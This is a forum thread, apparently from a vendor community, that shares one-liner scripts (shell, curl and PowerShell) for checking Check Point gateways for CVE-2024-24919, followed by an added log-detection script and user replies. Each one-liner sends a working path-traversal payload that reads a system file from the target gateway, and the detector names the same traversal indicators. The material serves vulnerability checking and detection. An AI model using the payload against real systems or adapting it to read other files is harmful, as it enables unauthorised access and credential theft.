Run this one-liner to check if your Check Point Gateway is vulnerable to CVE-2024-24919 (sk182336).
GAIA gateways and SMB gateways are supported.
1) Depending on where you want to run the one-liner, you can copy and paste the code for GAIA, Linux or PowerShell.
Copy the code into the CLI.
1a) GAIA version for expert mode:
clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl_cli --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"
1b) Linux version (all other Linux distributions):
clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"
1c) Windows PowerShell version:
clear;$C="";$O="";[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};Add-Type -AssemblyName Microsoft.VisualBasic;$IP_addr = [Microsoft.VisualBasic.Interaction]::InputBox("This is a test tool to check if your Check Point Gateway is vulnerable to CVE-2024-24919.`r`n`r`n`r`nDestination IP:", "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", "");try{$C=(Invoke-WebRequest -Uri "https://${ip_addr}/clients/MyCRL" -Method POST -Body "aCSHELL/../../../../../../../etc/cp-release" -TimeoutSec 5 )} catch [System.Net.WebException] { if([int]$_.Exception.Response.StatusCode -eq 404) {$O="`r`nNo vulnerability could be detected!`r`n" } else {$O="`r`nGateway is not reachable!`r`n"} }; if ($C.StatusCode -match "200") {$O="`r`nNo vulnerability could be detected!`r`n"; if ($C.content -match "Check Point") {$O="`r`nAttention! `r`nThis system is vulnerable to CVE-2024-24919. More read here sk182336.`r`n"}};Add-Type -AssemblyName System.Windows.Forms; $result = [System.Windows.Forms.MessageBox]::Show($O, "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::None)
2) Now enter the IP address of the gateway to be checked.
GAIA/Linux:
PowerShell:
If the following message appears, your system is vulnerable:
Attention!
The system is vulnerable to CVE-2024-24919.
More read here sk182336.
If the following message appears, your system is not vulnerable:
No vulnerability could be detected!
If no output appears, the system is not reachable.
---
Version:
1.5 06/02/2024 PowerShell interactive version with windows
1.4 06/01/2024 PowerShell version with correct status codes
1.3 06/01/2024 Linux and PowerShell version provided
1.2 05/30/2024 error with SMB applications fixed
1.1 05/29/2024 fixed error with output
1.0 05/28/2024 first version
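A defender-side companion to the check above, added here as an example and not part of the original post: it scans constructed web-log lines for the same indicators the one-liner uses, a request to /clients/MyCRL carrying a "../" sequence in the body, and URL-decodes the body before matching so encoded variants are not missed. The log layout is a constructed simplification for the example, not the gateway's real log format.

```python
import re
from urllib.parse import unquote

# Indicators taken from the check in the post: a POST to /clients/MyCRL whose
# body walks out of the web root with "../" to reach /etc/cp-release.
TARGET_PATH = "/clients/MyCRL"
TRAVERSAL = re.compile(r"\.\.[/\\]")
# Constructed sample lines (not real gateway logs): client_ip method path status "body"
SAMPLE_LOGS = [
    '203.0.113.5 POST /clients/MyCRL 200 "aCSHELL/../../../../../../../etc/cp-release"',
    '198.51.100.7 POST /clients/MyCRL 404 "aCSHELL/%2e%2e/%2e%2e/%2e%2e/etc/cp-release"',
    '192.0.2.9 POST /clients/MyCRL 200 "client.crl"',
    '192.0.2.10 GET /login/login.css 200 ""',
]
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "(.*)"$')

def normalize(text):
    """URL-decode up to three times so %2e%2e/ and %252e%252e/ both become ../."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def analyze(line):
    """Alert dict for a traversal attempt against the CRL endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status, body = m.groups()
    body = normalize(body)
    if path != TARGET_PATH or not TRAVERSAL.search(body):
        return None
    # The post reads a 404 as "not vulnerable" (request rejected); a 200 means
    # the gateway answered the traversal, which is the case to escalate.
    severity = "high" if status == "200" else "medium"
    requested = re.sub(r"^.*\.\.[/\\]", "", body)  # what lies after the last ../
    return {"ip": ip, "method": method, "status": int(status),
            "severity": severity, "requested": requested}

def scan(lines):
    """Run analyze() over every line and keep the hits."""
    return [a for a in map(analyze, lines) if a]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOGS):
        print(alert)
```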
Very helpful tool.
We have checked about 40 gateways and found a few without a hotfix in our company.
Thanks @HeikoAnkenbrand
Nice
Fantastic as always!
Hi,
Can you modify the script to check only for the HTTP response code after "| sed", because I think every gateway that responds with a response code other than 404 - File Not Found is vulnerable? This way the check can be used for small boxes not managed by a management server.
I have adapted the code so that it should now also work with SMB applications.
Here you can read the latest information from Check Point:
- Preventative Hotfix for CVE-2024-24919 - Quantum Gateway Information Disclosure
- Important security update - stay protected against VPN Information Disclosure (CVE-2024-24919)
I just ran it on my Azure fw and it did not display anything... weird, though I do have VPN enabled, as well as remote access too. I may need to read up on all this again, as I came back from vacation, so it's possible this is not even related to the original issue with local VPN users/remote access. Never mind, read it afterwards, it is related, but will look into it more Monday.
Andy
CVE-2024-24919 check tool by Heiko Ankenbrand 2024
Destination IP: 52.229.98.249
[Expert@azurefw:0]#
When running it on my gateway expert mode i get this:
Destination IP: 10.10.11.11
<!DOCTYPE html><HTML><HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE9,EmulateIE8"><meta name="others" content="WEBUI LOGIN PAGE" /><TITLE>GAiA</TITLE>
<link rel="shortcut icon" href="/login/fav.ico">
<link rel="stylesheet" type="text/css" href="/login/ext-all.css" />
<link rel="stylesheet" type="text/css" href="/login/login.css" />
<STYLE TYPE="text/css">
.ext-ie .webui-login-fld{font-size: 11px;}
</STYLE>
<script type="text/javascript" src="/login/ext-base.js"></script><script type="text/javascript" src="/login/ext-all.js"></script><script type="text/javascript">var errMsgText = "";var bannerMsgText = "";bannerMsgText += "This%20system%20is%20for%20authorized%20use%20only.%0A";var hostname='fw01';var version='R81.20';var formAction="/cgi-bin/home.tcl";</script><script type="text/javascript" src="/login/login.js"></script></HEAD><BODY><noscript><div style='font-size:20px;position:relative;top:100px;'>For full functionality of this site it is necessary to enable JavaScript.</div></noscript></BODY></HTML>
R81.20?
Hi @Moudar
This is the HTML code of the gateway login screen.
I have modified the one-liner so that this will no longer be shown in the future.
Is there a one-liner we can run on the gateway itself and how does this work in VSX?
I think that should work in VS0.
thanks Heiko
Version 1.5 works as an interactive version with windows:
AWESOME!
Hi Heiko,
Thanks for this script, it is really a shame that Check Point did not provide this themselves or at least refer to this article in the mitigation guide.
Looks like the problem has been around for a long time and it's strange that this has never been seen in a code review.
Usually you trust a firewall not to have such rookie bugs.
Markus
👍
@EitschStwoN
I think they don't want to publish the exploit code in the forum.
And from my point of view, that's a good thing.
Totally agree.